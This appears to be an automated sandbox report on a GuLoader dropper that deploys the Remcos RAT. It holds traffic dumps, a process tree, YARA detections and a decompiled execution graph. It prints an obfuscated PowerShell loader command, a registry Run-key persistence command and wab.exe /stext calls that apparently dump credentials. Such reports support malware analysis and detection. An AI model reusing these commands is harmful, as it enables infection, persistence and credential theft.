                                  Data Raw: 15 af 53 db b0 56 d1 2c 57 57 85 03 f1 02 e9 84 79 b2 02 12 26 ae 32 94 1e b8 db 2d 42 ec db a6 d6 6f 2c 5a b7 cd f4 26 5f 8f 16 56 8d c2 ea b4 63 28 f3 53 dd 05 f7 4a 8a ea 0e b8 18 31 18 f2 9f cd df 4e 86 d7 7c 85 fa c6 9c b0 2d 6f 97 0d c5 ee b3 12 8e f0 29 8c 61 19 51 2e 59 16 78 37 58 86 dd 42 87 af 88 69 f8 84 3f 6c 8c 37 eb b1 c7 a9 09 46 df 25 ae 10 4b 82 d5 c7 7c 1a 17 16 42 82 49 71 bb 61 f2 cb 59 6b 19 31 43 7c 91 f9 60 5d d2 5c 61 c4 b9 58 9a 7a b8 70 f6 2d 35 13 4f 36 ef d5 e8 86 27 74 ba 62 58 88 c6 6e a2 2a f1 be 8f 07 2e 56 41 fc 72 0e e7 b1 40 74 89 82 e0 45 13 6d 08 a9 02 a1 c0 81 d6 34 89 80 68 38 b5 e6 2d d4 cf 1a 47 f2 b7 cd bd b4 94 68 8d a8 fa 8c 6e 4a d1 bf 22 56 e5 f0 b0 70 74 2d 5f 11 60 07 65 be f6 b2 bc c5 ee d8 77 a7 cd 18 8f 15 cd 89 33 ab 14 b7 19 77 fd fa 92 9d b5 71 4c 2d 11 39 f8 ec 45 bd 3d e1 2f e5 2f 35 c7 1d 67 bc 8c f4 e7 63 66 5f 7f f1 8a d0 a1 89 4b 75 00 69 74 06 73 0d ed bf 8f 3b 93 a4 42 71 33 90 83 3d 95 af 59 a4 06 fa 5c 14 5f 87 ca 57 60 7f 94 8d 0a 15 [TRUNCATED]
                                  Data Ascii: SV,WWy&2-Bo,Z&_Vc(SJ1N|-o)aQ.Yx7XBi?l7F%K|BIqaYk1C|`]\aXzp-5O6'tbXn*.VAr@tEm4h8-GhnJ"Vpt-_`ew3wqL-9E=//5gcf_Kuits;Bq3=Y\_W`X9r6@[inl:5jO0E/{Ha1V~)!05+$}.P/1@p BVVOv$EG$v?c`;Sj0[@I}2j]Kd_s2W]?t,5xq ."tP0Hs0"!=?4TRgF2=TtL6^`CO4hZ^^_l3Jh*F1N_gwmoS>-`Q"S9Aup:g@2Le:w"kLjLEuns{]Q$`4#1fLzSod*PJG}qLH&QPnl8@v)r2.8S4h%^1XBE#QR@;3;Wmb$%8OJP/hU=Miosj{@dUv_HlC7|}AMSC\T],x|u[p0N
                                  Aug 29, 2024 12:03:38.346662998 CEST1236INData Raw: b3 39 20 1b 4f 04 74 00 76 9d 7a cf 99 1c 66 7c 7c c4 dc f6 e5 32 92 07 69 5b d1 94 7b 18 78 3d 46 55 47 af 03 dc 90 65 44 7e d8 cb 39 38 eb a3 ec e9 03 d4 66 50 3c ff 6a a1 10 12 47 f4 d9 b3 e9 7d 67 16 b4 2b 4e c0 e2 2e 16 07 5a 96 28 84 97 7b
                                  Data Ascii: 9 Otvzf||2i[{x=FUGeD~98fP<jG}g+N.Z({2`oI^26cPl9LD=SrUrq8vmu)H)+f3uZ~gUAPR8=l43)]F)o=Q{&*Z%Dvr@@,]Rm`"
                                  Aug 29, 2024 12:03:38.346674919 CEST1236INData Raw: 70 4f 9c 39 73 51 03 5b 15 35 ef de bf f6 40 9c e3 8e ec 3e c3 db c1 f6 d4 37 0a a8 03 4a 98 59 07 2e 10 27 0a 42 c0 0c 91 8c 23 ee 19 8f 7b 9a 37 e5 05 0a 13 f7 ed a5 4d a8 fd d5 e2 e6 69 05 89 6f de 12 f5 85 bc 40 3e 88 08 9c fb 1b f7 ea 90 2d
                                  Data Ascii: pO9sQ[5@>7JY.'B#{7Mio@>-( 0,1XFY8t6brLgF>HY"R|}9{g4o\\~Z[neYsO_HO:P7'E/sLE=Eg9ULY5
                                  Aug 29, 2024 12:03:38.346687078 CEST1236INData Raw: e8 54 51 90 40 61 51 89 70 7b 3c 29 b0 82 ed bd 84 72 f2 ef 9a ec 9f b2 4d 87 ff dd 66 a3 4f b3 2b ba 97 ba ba 85 57 63 0a 6a 27 96 20 43 4c ce 2e 12 5a 0b df c4 ed 20 15 11 6d 01 f9 73 13 b3 aa 86 e6 74 55 bf a9 73 ee 64 b0 ef 6e a3 03 f6 d4 c8
                                  Data Ascii: TQ@aQp{<)rMfO+Wcj' CL.Z mstUsdnjkKz@&sNt4o`/K&}vV8"5IC(bo0_+]7h,XxpdSv.oVu]j49Vf" Ik
                                  Aug 29, 2024 12:03:38.346699953 CEST1236INData Raw: f0 4c 96 c2 65 1e f3 83 e5 97 47 d4 16 91 2a b6 a4 8b 79 a4 a2 46 24 f6 b2 73 3a 09 c3 ef 43 17 ac 11 ad f5 a9 6b 95 ad af 51 29 32 3a c4 1f f2 07 0f 91 0f b9 52 4c e4 70 57 ae 32 62 58 5b 5c 4a 95 67 2b a7 08 0e d5 3a 9d 19 42 87 e1 5f ec eb c5
                                  Data Ascii: LeG*yF$s:CkQ)2:RLpW2bX[\Jg+:B_$ 7D$+NvH<xK`A*v= oH18T)#F^#T8@4#L\W1h|IX>$"{lRFLhi&tP
                                  Aug 29, 2024 12:03:38.346712112 CEST1236INData Raw: a6 db 56 a6 17 2c 4b d4 0f 10 fd e2 16 fb 8d 37 37 45 eb 73 9f dc fe 04 df 21 4f c6 47 ad b3 50 8f cf 2b 2c e7 cc e5 95 5e 9f 69 0f c1 3d 97 65 f6 13 24 c5 13 67 e0 80 6c 70 71 82 60 19 f1 9a a5 8a bf 18 ab fd aa 3d ce a6 5a 44 f0 86 f6 c1 43 2b
                                  Data Ascii: V,K77Es!OGP+,^i=e$glpq`=ZDC+^~5kO+RW;U"=q\wmNq6S?BZ?USr>{{S#:`eQ_3-Sk8t}sS/(uUCu3ty-|e[^Ci%.
                                  Aug 29, 2024 12:03:38.346724987 CEST1236INData Raw: 54 d1 4f 5c ae 7f 14 e1 e7 cd 59 2b fd 41 be 41 64 bd 2d 6b 17 30 af fc 33 23 6c 5c d1 f1 1a 22 3c c1 40 4d d0 68 36 f1 7f 47 9e 6b cd 71 92 c8 b1 c6 92 fa a4 bd a6 0e a0 53 4c f5 e2 33 fa 21 6f 03 a2 f7 af b0 aa fa 4e 2c f5 b4 a5 28 2c 3a 77 de
                                  Data Ascii: TO\Y+AAd-k03#l\"<@Mh6GkqSL3!oN,(,:wh2'kAO~0aU%uc"_K|DjmEv,NlTDqa/ZT3[hU_P!U;TG"/%x-!K. &rv
                                  Aug 29, 2024 12:03:38.346812010 CEST1236INData Raw: 11 a6 81 cf 53 b1 5c c1 32 1f 57 a2 a1 9a 82 d6 56 fd 19 20 94 c5 d8 96 05 e0 c9 d6 af eb f7 0b a1 be 4b 59 8d 97 c1 73 7c 80 47 34 00 a9 67 85 d9 8d f7 81 83 c6 44 dd 15 2e 17 54 2e a0 cc bc 25 aa 6c 73 09 9b 4c 7d b3 58 a4 06 71 84 2f 81 f4 cf
                                  Data Ascii: S\2WV KYs|G4gD.T.%lsL}Xq/w!Zl+4NRo5A$~!oG&Mh~ DM;zd]g;]VnZVoaI<=_Nf$c`~W;J=JEk'=fM:
                                  Aug 29, 2024 12:03:38.346822977 CEST1236INData Raw: ff e5 e2 b3 f9 2e a5 00 88 ac cd a8 85 16 20 4e 22 29 87 f1 31 8c 65 9c 95 e9 bd 72 98 94 8d 61 b9 98 a5 08 92 33 fa 7a d6 71 f6 04 a2 fc c6 a8 72 df 70 f0 35 40 04 f7 24 61 dc 46 65 fe 92 1c 3e 91 e2 a7 75 69 76 41 13 28 17 4a f7 b0 b2 a5 43 63
                                  Data Ascii: . N")1era3zqrp5@$aFe>uivA(JCcY{\XdcM^O@?P)<%U?/tUegPPf&2CZXR2;v&$5(#0f">6yCNl8A2^L*>
                                  Aug 29, 2024 12:03:38.346834898 CEST1236INData Raw: 36 2e bd 93 09 e8 91 db cb 34 06 bd aa 6b 0a cf 13 80 03 d1 df ba 12 77 7c 53 f1 1c 81 2b d6 8f fd aa 7c 42 cc 86 80 b7 d9 8d 82 d3 79 c2 d6 78 e4 48 0d 91 56 7e 1b f0 ba 05 c1 c9 76 ff 74 34 15 03 72 6e 83 b6 f4 6b bf a4 4f 7a b7 43 ad 85 34 af
                                  Data Ascii: 6.4kw|S+|ByxHV~vt4rnkOzC4${C`B'P4]*04tSXR_fUv*"5U79]gYg1t7~u8m3n=Pe"e~'[b_T3-BbR~AX]WUBO"
                                  Aug 29, 2024 12:03:38.351629019 CEST1043INData Raw: 63 21 f5 79 0e ab bf 01 56 a9 4f f0 9d b8 eb bc 75 27 0b 07 14 b2 3e d4 64 b5 b3 54 61 9b 1d df bd d0 d3 85 67 58 ee 42 d9 d6 53 9b 5a e8 03 01 6c fc 11 86 a5 61 82 1c 00 65 ef 1b 89 41 e0 e6 f0 90 55 4a 67 f0 c4 a6 c7 67 42 f0 b3 92 0b 80 1a 7b
                                  Data Ascii: c!yVOu'>dTagXBSZlaeAUJggB{p~a4%oJj#$(]q7xdI[$H>CY<sl=!|tB-t-z(BU}e|TsJxL,odcH3Q?LLb


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.549743178.237.33.5080356C:\Program Files (x86)\Windows Mail\wab.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 29, 2024 12:03:57.430810928 CEST71OUTGET /json.gp HTTP/1.1
                                  Host: geoplugin.net
                                  Cache-Control: no-cache
                                  Aug 29, 2024 12:03:58.139753103 CEST1170INHTTP/1.1 200 OK
                                  date: Thu, 29 Aug 2024 10:03:57 GMT
                                  server: Apache
                                  content-length: 962
                                  content-type: application/json; charset=utf-8
                                  cache-control: public, max-age=300
                                  access-control-allow-origin: *
                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                  Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                  Aug 29, 2024 12:03:58.370611906 CEST1170INHTTP/1.1 200 OK
                                  date: Thu, 29 Aug 2024 10:03:57 GMT
                                  server: Apache
                                  content-length: 962
                                  content-type: application/json; charset=utf-8
                                  cache-control: public, max-age=300
                                  access-control-allow-origin: *
                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                  Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:06:02:23
                                  Start date:29/08/2024
                                  Path:C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe"
                                  Imagebase:0x400000
                                  File size:652'036 bytes
                                  MD5 hash:C1C571C4F8F69D3C8AA0EC091173BD5E
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:06:02:24
                                  Start date:29/08/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)"
                                  Imagebase:0x1d0000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3167388642.000000000BD84000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:06:02:24
                                  Start date:29/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:06:03:16
                                  Start date:29/08/2024
                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                  Imagebase:0xcd0000
                                  File size:516'608 bytes
                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3515260679.000000000078E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  Target ID:10
                                  Start time:06:03:33
                                  Start date:29/08/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"
                                  Imagebase:0x790000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:06:03:33
                                  Start date:29/08/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6d64d0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:06:03:33
                                  Start date:29/08/2024
                                  Path:C:\Windows\SysWOW64\reg.exe
                                  Wow64 process (32bit):true
                                  Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"
                                  Imagebase:0x720000
                                  File size:59'392 bytes
                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:13
                                  Start time:06:03:58
                                  Start date:29/08/2024
                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vcrnmdjhacaz"
                                  Imagebase:0xcd0000
                                  File size:516'608 bytes
                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:14
                                  Start time:06:03:58
                                  Start date:29/08/2024
                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fwegnvuioksemqa"
                                  Imagebase:0xcd0000
                                  File size:516'608 bytes
                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:15
                                  Start time:06:03:58
                                  Start date:29/08/2024
                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iykqoofccsljowohdo"
                                  Imagebase:0xcd0000
                                  File size:516'608 bytes
                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:21.5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:17.4%
                                    Total number of Nodes:1330
                                    Total number of Limit Nodes:32
                                    execution_graph 3951 401d44 3952 402bac 17 API calls 3951->3952 3953 401d52 SetWindowLongA 3952->3953 3954 402a5a 3953->3954 3955 401ec5 3956 402bac 17 API calls 3955->3956 3957 401ecb 3956->3957 3958 402bac 17 API calls 3957->3958 3959 401ed7 3958->3959 3960 401ee3 ShowWindow 3959->3960 3961 401eee EnableWindow 3959->3961 3962 402a5a 3960->3962 3961->3962 3205 401746 3206 402bce 17 API calls 3205->3206 3207 40174d 3206->3207 3211 405c89 3207->3211 3209 401754 3210 405c89 2 API calls 3209->3210 3210->3209 3212 405c94 GetTickCount GetTempFileNameA 3211->3212 3213 405cc1 3212->3213 3214 405cc5 3212->3214 3213->3212 3213->3214 3214->3209 3963 401947 3964 402bce 17 API calls 3963->3964 3965 40194e lstrlenA 3964->3965 3966 402620 3965->3966 3974 404b4a GetDlgItem GetDlgItem 3975 404ba0 7 API calls 3974->3975 3980 404dc7 3974->3980 3976 404c48 DeleteObject 3975->3976 3977 404c3c SendMessageA 3975->3977 3978 404c53 3976->3978 3977->3976 3979 404c8a 3978->3979 3981 406154 17 API calls 3978->3981 3982 404145 18 API calls 3979->3982 3988 404ea9 3980->3988 4009 404e36 3980->4009 4028 404a98 SendMessageA 3980->4028 3986 404c6c SendMessageA SendMessageA 3981->3986 3987 404c9e 3982->3987 3983 404f55 3984 404f67 3983->3984 3985 404f5f SendMessageA 3983->3985 3995 404f80 3984->3995 3996 404f79 ImageList_Destroy 3984->3996 4012 404f90 3984->4012 3985->3984 3986->3978 3992 404145 18 API calls 3987->3992 3988->3983 3993 404f02 SendMessageA 3988->3993 4014 404dba 3988->4014 3989 404e9b SendMessageA 3989->3988 3990 4041ac 8 API calls 3994 405155 3990->3994 4011 404caf 3992->4011 3997 404f17 SendMessageA 3993->3997 3993->4014 3998 404f89 GlobalFree 3995->3998 3995->4012 3996->3995 4000 404f2a 3997->4000 3998->4012 3999 404d89 GetWindowLongA SetWindowLongA 4003 404da2 3999->4003 4013 404f3b SendMessageA 4000->4013 4001 405109 4002 40511b ShowWindow GetDlgItem ShowWindow 4001->4002 4001->4014 4002->4014 4004 404da7 ShowWindow 4003->4004 4005 404dbf 4003->4005 4026 40417a SendMessageA 4004->4026 4027 40417a SendMessageA 4005->4027 4006 404d84 4006->3999 4006->4003 4009->3988 4009->3989 4010 404d01 SendMessageA 4010->4011 4011->3999 4011->4006 4011->4010 4015 404d53 SendMessageA 4011->4015 4016 404d3f SendMessageA 4011->4016 4012->4001 4021 404fcb 4012->4021 4033 404b18 4012->4033 4013->3983 4014->3990 4015->4011 4016->4011 4018 4050d5 4019 4050df InvalidateRect 4018->4019 4022 4050eb 4018->4022 4019->4022 4020 404ff9 SendMessageA 4024 40500f 4020->4024 4021->4020 4021->4024 4022->4001 4042 404a53 4022->4042 4023 405083 SendMessageA SendMessageA 4023->4024 4024->4018 4024->4023 4026->4014 4027->3980 4029 404af7 SendMessageA 4028->4029 4030 404abb GetMessagePos ScreenToClient SendMessageA 4028->4030 4032 404aef 4029->4032 4031 404af4 4030->4031 4030->4032 4031->4029 4032->4009 4045 4060c1 lstrcpynA 4033->4045 4035 404b2b 4046 40601f wsprintfA 4035->4046 4037 404b35 4038 40140b 2 API calls 4037->4038 4039 404b3e 4038->4039 4047 4060c1 lstrcpynA 4039->4047 4041 404b45 4041->4021 4048 40498e 4042->4048 4044 404a68 4044->4001 4045->4035 4046->4037 4047->4041 4049 4049a4 4048->4049 4050 406154 17 API calls 4049->4050 4051 404a08 4050->4051 4052 406154 17 API calls 4051->4052 4053 404a13 4052->4053 4054 406154 17 API calls 4053->4054 4055 404a29 lstrlenA wsprintfA SetDlgItemTextA 4054->4055 4055->4044 4059 401fcb 4060 402bce 17 API calls 4059->4060 4061 401fd2 4060->4061 4062 406435 2 API calls 4061->4062 4063 401fd8 4062->4063 4065 401fea 4063->4065 4066 40601f wsprintfA 4063->4066 4066->4065 4067 4014d6 4068 402bac 17 API calls 4067->4068 4069 4014dc Sleep 4068->4069 4071 402a5a 4069->4071 4072 4045d7 4073 404603 4072->4073 4074 404614 4072->4074 4133 4057c1 GetDlgItemTextA 4073->4133 4076 404620 GetDlgItem 4074->4076 4081 40467f 4074->4081 4079 404634 4076->4079 4077 404763 4131 40490d 4077->4131 4135 4057c1 GetDlgItemTextA 4077->4135 4078 40460e 4080 40639c 5 API calls 4078->4080 4083 404648 SetWindowTextA 4079->4083 4084 405af2 4 API calls 4079->4084 4080->4074 4081->4077 4085 406154 17 API calls 4081->4085 4081->4131 4087 404145 18 API calls 4083->4087 4089 40463e 4084->4089 4090 4046f3 SHBrowseForFolderA 4085->4090 4086 404793 4091 405b47 18 API calls 4086->4091 4092 404664 4087->4092 4088 4041ac 8 API calls 4093 404921 4088->4093 4089->4083 4097 405a59 3 API calls 4089->4097 4090->4077 4094 40470b CoTaskMemFree 4090->4094 4095 404799 4091->4095 4096 404145 18 API calls 4092->4096 4098 405a59 3 API calls 4094->4098 4136 4060c1 lstrcpynA 4095->4136 4099 404672 4096->4099 4097->4083 4100 404718 4098->4100 4134 40417a SendMessageA 4099->4134 4103 40474f SetDlgItemTextA 4100->4103 4108 406154 17 API calls 4100->4108 4103->4077 4104 404678 4106 4064ca 5 API calls 4104->4106 4105 4047b0 4107 4064ca 5 API calls 4105->4107 4106->4081 4119 4047b7 4107->4119 4109 404737 lstrcmpiA 4108->4109 4109->4103 4112 404748 lstrcatA 4109->4112 4110 4047f3 4137 4060c1 lstrcpynA 4110->4137 4112->4103 4113 4047fa 4114 405af2 4 API calls 4113->4114 4115 404800 GetDiskFreeSpaceA 4114->4115 4118 404824 MulDiv 4115->4118 4120 40484b 4115->4120 4117 405aa0 2 API calls 4117->4119 4118->4120 4119->4110 4119->4117 4119->4120 4121 4048bc 4120->4121 4123 404a53 20 API calls 4120->4123 4122 4048df 4121->4122 4124 40140b 2 API calls 4121->4124 4138 404167 KiUserCallbackDispatcher 4122->4138 4125 4048a9 4123->4125 4124->4122 4127 4048be SetDlgItemTextA 4125->4127 4128 4048ae 4125->4128 4127->4121 4130 40498e 20 API calls 4128->4130 4129 4048fb 4129->4131 4139 404530 4129->4139 4130->4121 4131->4088 4133->4078 4134->4104 4135->4086 4136->4105 4137->4113 4138->4129 4140 404543 SendMessageA 4139->4140 4141 40453e 4139->4141 4140->4131 4141->4140 3844 401759 3845 402bce 17 API calls 3844->3845 3846 401760 3845->3846 3847 401786 3846->3847 3848 40177e 3846->3848 3884 4060c1 lstrcpynA 3847->3884 3883 4060c1 lstrcpynA 3848->3883 3851 401784 3855 40639c 5 API calls 3851->3855 3852 401791 3853 405a59 3 API calls 3852->3853 3854 401797 lstrcatA 3853->3854 3854->3851 3866 4017a3 3855->3866 3856 406435 2 API calls 3856->3866 3857 405c35 2 API calls 3857->3866 3859 4017ba CompareFileTime 3859->3866 3860 40187e 3861 4051e8 24 API calls 3860->3861 3864 401888 3861->3864 3862 4051e8 24 API calls 3865 40186a 3862->3865 3863 4060c1 lstrcpynA 3863->3866 3867 4030d8 35 API calls 3864->3867 3866->3856 3866->3857 3866->3859 3866->3860 3866->3863 3871 406154 17 API calls 3866->3871 3877 4057dd MessageBoxIndirectA 3866->3877 3880 401855 3866->3880 3882 405c5a GetFileAttributesA CreateFileA 3866->3882 3868 40189b 3867->3868 3869 4018af SetFileTime 3868->3869 3870 4018c1 FindCloseChangeNotification 3868->3870 3869->3870 3870->3865 3872 4018d2 3870->3872 3871->3866 3873 4018d7 3872->3873 3874 4018ea 3872->3874 3875 406154 17 API calls 3873->3875 3876 406154 17 API calls 3874->3876 3878 4018df lstrcatA 3875->3878 3879 4018f2 3876->3879 3877->3866 3878->3879 3881 4057dd MessageBoxIndirectA 3879->3881 3880->3862 3880->3865 3881->3865 3882->3866 3883->3851 3884->3852 4142 401959 4143 402bac 17 API calls 